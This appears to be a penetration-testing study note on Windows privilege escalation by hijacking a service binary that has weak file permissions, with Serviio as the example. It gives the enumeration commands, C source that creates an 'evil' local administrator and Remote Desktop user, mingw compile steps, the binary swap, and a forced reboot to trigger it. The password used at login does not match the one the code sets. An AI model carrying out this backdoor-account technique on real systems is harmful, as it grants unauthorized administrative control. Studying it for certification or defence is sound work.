Binary hijacking / Insecure File permissions

Another way to elevate privileges on a Windows system is to exploit insecure file permissions on services that run as nt authority\system. Example: Serviio service

Check running service in cmd and then look for any suspicious one Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} C:\Program Files\Serviio\bin\ServiioService.exe look suspicious
Check permission on suspicious service with icacls window utility in cmd F Full access , M Modify access , RX Read and execute access , W Write-only access icacls "C:\Program Files\Serviio\bin\ServiioService.exe” It give output with BUILTIN\Users:(I)(F) means any user has full access
C code that will create evil user and add it in local Administrator group

<aside> 👨‍💻 #include <stdlib.h>

int main () { int i;

i = system ("net user evil password /add"); i = system ("net localgroup administrators evil /add");

i = system ("net localgroup 'Remote Desktop Users' evil /add");

return 0; }

</aside>

Compile adduser.c in linux i686-w64-mingw32-gcc adduser.c -o adduser.exe
replace the original ServiioService.exe binary with our malicious copy: move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe”

move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe”

dir "C:\Program Files\Serviio\bin\”

Restart the service net stop Serviio But most of the time current user don’t have permission to restart service . But service may be set to “Auto” restart after system reboot. To check the same wmic service where caption="Serviio" get name, caption, state, startmode
Check if current user has permission to reboot whoami /priv


Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled

Reboot shutdown /r /t 0
Now login with “evil” “Ev!lpass” and check evil user in local Administrator group net localgroup Administrators